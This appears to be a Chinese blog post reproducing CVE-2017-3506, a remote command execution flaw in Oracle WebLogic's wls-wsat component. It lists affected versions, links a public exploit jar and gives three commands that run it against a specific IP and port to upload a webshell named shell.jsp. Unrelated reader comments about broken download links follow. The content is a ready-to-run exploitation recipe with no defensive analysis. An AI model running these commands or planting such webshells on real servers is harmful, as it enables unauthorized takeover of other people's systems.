CVE-2017-3506
漏洞描述:wls-wsat组件远程命令执行
影响范围:
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
EXP:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2017-3506_webshell.jar
复现
- java -jar cve-2017-3506_webshell.jar
- java -jar cve-2017-3506_webshell.jar -u http://123.58.224.8:52925/
- java -jar cve-2017-3506_webshell.jar -s http://123.58.224.8:52925 /wls-wsat/CoordinatorPortType11 shell.jsp
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 22天前0
好的,谢谢昶之琴 24天前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 25天前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下